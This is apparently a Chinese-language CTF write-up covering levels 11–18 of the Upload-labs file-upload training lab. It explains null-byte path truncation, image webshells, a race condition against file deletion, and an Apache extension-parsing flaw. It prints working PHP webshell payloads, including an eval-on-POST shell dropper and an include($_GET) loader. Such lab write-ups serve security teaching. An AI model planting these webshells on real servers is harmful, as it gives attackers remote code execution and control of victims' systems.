CTF

Upload-labs题解(下)

前十道题连接

Pass-11

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

分析

这次是将文件名.后截取,和白名单匹配,看似没有什么问题,不过可以上传文件路径。通过把shell.php上传到路径中截断的方式可以得到上传web shell的目的。因为路径是要与文件名拼接的,让文件在存放的时候读取到拼接后被截断的位置就停止(字符串结束符0,在url编码后为%00)。

在url中%00表示ascll码中的0 ,而ascii中0作为特殊字符保留,表示字符串结束,所以当url中出现%00时就会认为读取已结束

  • upfiles/?filename=test.txt  上传的是test.txt
  • upfiles/?filename=shell.php%00test.txt 上传的是shell.php

题解

image 50

上传成功!

Pass-12

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

分析

这次上传的路径是post形式,可以通过00截断。0x开头表示16进制,0在十六进制中是00, 0x00就是%00解码成的16进制。

题解

image

把上传路径换成shell.php,注意p后面有一个空格(方便一会识别)

image 1

进入Hex模式,修改16进制,这里左侧16进制与右侧文本是按行对应的。找到刚刚更改的shell.php。在php的十六进制是70 68 70。点击后面的20。右键插入字节(默认是00)

image 2

上传成功!

Pass-13 14 15 16

前三道题都是图片,只要构造好图片马上传连接即可

16题使用了二次渲染,图片马制作方法

图片马是把一句话木马写入到图片内,再通过文件上传漏洞将图片解析成php执行。

image 8

这里我构造好了 png jpg gif 格式的图片马 点击下载 (不含16题)

png 的shell是 shell jpg和gif的shell 是 1

此外,要利用文件上传漏洞,在upload文件夹内还要有这段代码

image 9
<?php
$file=$_GET[page];
include($file);
?>

我们进行连接时,通过给page传参数,即可连接

image 10

Pass-17

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

分析

这次使用的仍然是白名单,但不一样的是。这次是先上传文件到文件夹,如果不符合白名单的条件再调用unlink删除这个文件。

可以使用条件竞争的方法,不停的向服务器上传webshell。当服务器没来得及调用unlink函数时访问。这个webshell是特殊的,调用它会再生成一个webshell从而在服务器里保存。

in_shell.php文件:

<?php
phpinfo();
@eval(file_put_contents("shell.php","<?php @eval(\$_POST[shell]);?>"));
?>

调用后会生成 shell.php

题解

先上传源文件,使用bp抓包。

image 12

使用intruder入侵

image 13

无限上传

image 14

线程100

image 15

在启动之前,去浏览器输入访问的文件(提前上传一个png查看返回路径)

image 16

启动intruder,在浏览器不停刷新,注意这里要换一个不被bp监听的浏览器。当有phpinfo界面一闪而过时,说明已经上传成功了。去网站目录也可以看见。

image 17

菜刀连接即可。

Pass-18


index.php代码

//index.php
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
    require_once("./myupload.php");
    $imgFileName =time();
    $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
    $status_code = $u->upload(UPLOAD_PATH);
    switch ($status_code) {
        case 1:
            $is_upload = true;
            $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
            break;
        case 2:
            $msg = '文件已经被上传,但没有重命名。';
            break; 
        case -1:
            $msg = '这个文件不能上传到服务器的临时文件存储目录。';
            break; 
        case -2:
            $msg = '上传失败,上传目录不可写。';
            break; 
        case -3:
            $msg = '上传失败,无法上传该类型文件。';
            break; 
        case -4:
            $msg = '上传失败,上传的文件过大。';
            break; 
        case -5:
            $msg = '上传失败,服务器已经存在相同名称文件。';
            break; 
        case -6:
            $msg = '文件无法上传,文件不能复制到目标目录。';
            break;      
        default:
            $msg = '未知错误!';
            break;
    }
}

//myupload.php
class MyUpload{
......
......
...... 
  var $cls_arr_ext_accepted = array(
      ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
      ".html", ".xml", ".tiff", ".jpeg", ".png" );

......
......
......  
  /** upload()
   **
   ** Method to upload the file.
   ** This is the only method to call outside the class.
   ** @para String name of directory we upload to
   ** @returns void
  **/
  function upload( $dir ){
    
    $ret = $this->isUploadedFile();
    
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->setDir( $dir );
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkExtension();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkSize();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }
    
    // if flag to check if the file exists is set to 1
    
    if( $this->cls_file_exists == 1 ){
      
      $ret = $this->checkFileExists();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }

    // if we are here, we are ready to move the file to destination

    $ret = $this->move();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }

    // check if we need to rename the file

    if( $this->cls_rename_file == 1 ){
      $ret = $this->renameFile();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }
    
    // if we are here, everything worked as planned :)

    return $this->resultUpload( "SUCCESS" );
  
  }
......
......
...... 
};


Copyright @ 2018 ~ 2020 by c0ny1

分析

白名单中存在.7z这个后缀名,apache不能解析,因此可以利用apache的解析漏洞,命名文件为1.php.7z,这样,apche从右往左解析时,遇到.7z不认识,就把这个文件当作.php来解析。

这道首先会检测文件名.结尾后是不是白名单,如果是的话就进行move。然后再进行重命名(把.之前的去掉),我们可以利用这个间隙不断地上传shell.php.7z文件,就可以进行资源竞争。

这里与上一关方法相同,发现了上传返回不一样的文件。

image 26

去看文件果然上传成功,注意这里的前缀是因为uploadlabs的bug,应该在upload目录下的,现在没有分开,不过意思已经表达到了。当我们连接这个文件时,

image 27
image 28

搞定!

继续更新~

One thought on “Upload-labs题解(下)

发表评论